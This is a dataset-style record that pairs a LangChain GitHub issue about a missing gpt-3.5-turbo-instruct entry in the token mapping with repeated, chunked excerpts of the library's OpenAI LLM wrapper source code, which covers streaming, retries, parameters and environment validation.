) -> None:
"""Update token usage."""
_keys_to_use = keys.intersection(response["usage"])
for _key in _keys_to_use:
if _key not in token_usage:
token_usage[_key] = response["usage"][_key]
else:
token_usage[_key] += response["usage"][_key]
def _stream_response_to_generation_chunk(
stream_response: Dict[str, Any],
) -> GenerationChunk:
"""Convert a stream response to a generation chunk."""
return GenerationChunk(
text=stream_response["choices"][0]["text"],
generation_info=dict(
finish_reason=stream_response["choices"][0].get("finish_reason", None),
logprobs=stream_response["choices"][0].get("logprobs", None),
),
)
def _update_response(response: Dict[str, Any], stream_response: Dict[str, Any]) -> None:
"""Update response from the stream response."""
response["choices"][0]["text"] += stream_response["choices"][0]["text"]
response["choices"][0]["finish_reason"] = stream_response["choices"][0].get(
"finish_reason", None
)
response["choices"][0]["logprobs"] = stream_response["choices"][0]["logprobs"]
def _streaming_response_template() -> Dict[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | return {
"choices": [
{
"text": "",
"finish_reason": None,
"logprobs": None,
}
]
}
def _create_retry_decorator(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[
Union[AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun]
] = None,
) -> Callable[[Any], Any]:
import openai
errors = [
openai.error.Timeout,
openai.error.APIError,
openai.error.APIConnectionError,
openai.error.RateLimitError,
openai.error.ServiceUnavailableError,
]
return create_base_retry_decorator(
error_types=errors, max_retries=llm.max_retries, run_manager=run_manager
)
def completion_with_retry( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Any:
"""Use tenacity to retry the completion call."""
retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
@retry_decorator
def _completion_with_retry(**kwargs: Any) -> Any:
return llm.client.create(**kwargs)
return _completion_with_retry(**kwargs)
async def acompletion_with_retry(
llm: Union[BaseOpenAI, OpenAIChat],
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Any:
"""Use tenacity to retry the async completion call."""
retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
@retry_decorator
async def _completion_with_retry(**kwargs: Any) -> Any:
return await llm.client.acreate(**kwargs)
return await _completion_with_retry(**kwargs)
class BaseOpenAI(BaseLLM): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Base OpenAI large language model class."""
@property
def lc_secrets(self) -> Dict[str, str]:
return {"openai_api_key": "OPENAI_API_KEY"}
@property
def lc_serializable(self) -> bool:
return True
client: Any = None
model_name: str = Field(default="text-davinci-003", alias="model")
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 256
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the models maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
n: int = 1
"""How many completions to generate for each prompt."""
best_of: int = 1
"""Generates best_of completions server-side and returns the "best"."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified.""" |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | openai_api_key: Optional[str] = None
openai_api_base: Optional[str] = None
openai_organization: Optional[str] = None
openai_proxy: Optional[str] = None
batch_size: int = 20
"""Batch size to use when passing multiple documents to generate."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout for requests to OpenAI completion API. Default is 600 seconds."""
logit_bias: Optional[Dict[str, float]] = Field(default_factory=dict)
"""Adjust the probability of specific tokens being generated."""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
streaming: bool = False
"""Whether to stream the results or not."""
allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
"""Set of special tokens that are allowed。"""
disallowed_special: Union[Literal["all"], Collection[str]] = "all"
"""Set of special tokens that are not allowed。"""
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
def __new__(cls, **data: Any) -> Union[OpenAIChat, BaseOpenAI]: # ty |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Initialize the OpenAI object."""
model_name = data.get("model_name", "")
if (
model_name.startswith("gpt-3.5-turbo") or model_name.startswith("gpt-4")
) and "-instruct" not in model_name:
warnings.warn(
"You are trying to use a chat model. This way of initializing it is "
"no longer supported. Instead, please use: "
"`from langchain.chat_models import ChatOpenAI`"
)
return OpenAIChat(**data)
return super().__new__(cls)
class Config:
"""Configuration for this pydantic object."""
allow_population_by_field_name = True
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
values["model_kwargs"] = build_extra_kwargs(
extra, values, all_required_field_names
)
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | values["client"] = openai.Completion
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
if values["streaming"] and values["n"] > 1:
raise ValueError("Cannot stream results when n > 1.")
if values["streaming"] and values["best_of"] > 1:
raise ValueError("Cannot stream results when best_of > 1.")
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
normal_params = {
"temperature": self.temperature,
"max_tokens": self.max_tokens,
"top_p": self.top_p,
"frequency_penalty": self.frequency_penalty,
"presence_penalty": self.presence_penalty,
"n": self.n,
"request_timeout": self.request_timeout,
"logit_bias": self.logit_bias,
}
# Az
# do
if self.best_of > 1:
normal_params["best_of"] = self.best_of
return {**normal_params, **self.model_kwargs}
def _stream( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
params = {**self._invocation_params, **kwargs, "stream": True}
self.get_sub_prompts(params, [prompt], stop) # th
for stream_resp in completion_with_retry(
self, prompt=prompt, run_manager=run_manager, **params
):
chunk = _stream_response_to_generation_chunk(stream_resp)
yield chunk
if run_manager:
run_manager.on_llm_new_token(
chunk.text,
chunk=chunk,
verbose=self.verbose,
logprobs=chunk.generation_info["logprobs"]
if chunk.generation_info
else None,
)
async def _astream( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> AsyncIterator[GenerationChunk]:
params = {**self._invocation_params, **kwargs, "stream": True}
self.get_sub_prompts(params, [prompt], stop) # th
async for stream_resp in await acompletion_with_retry(
self, prompt=prompt, run_manager=run_manager, **params
):
chunk = _stream_response_to_generation_chunk(stream_resp)
yield chunk
if run_manager:
await run_manager.on_llm_new_token(
chunk.text,
chunk=chunk,
verbose=self.verbose,
logprobs=chunk.generation_info["logprobs"]
if chunk.generation_info
else None,
)
def _generate( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Call out to OpenAI's endpoint with k unique prompts.
Args:
prompts: The prompts to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The full LLM output.
Example:
.. code-block:: python
response = openai.generate(["Tell me a joke."])
"""
# TO
params = self._invocation_params
params = {**params, **kwargs}
sub_prompts = self.get_sub_prompts(params, prompts, stop)
choices = []
token_usage: Dict[str, int] = {}
# Ge
# In
_keys = {"completion_tokens", "prompt_tokens", "total_tokens"} |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
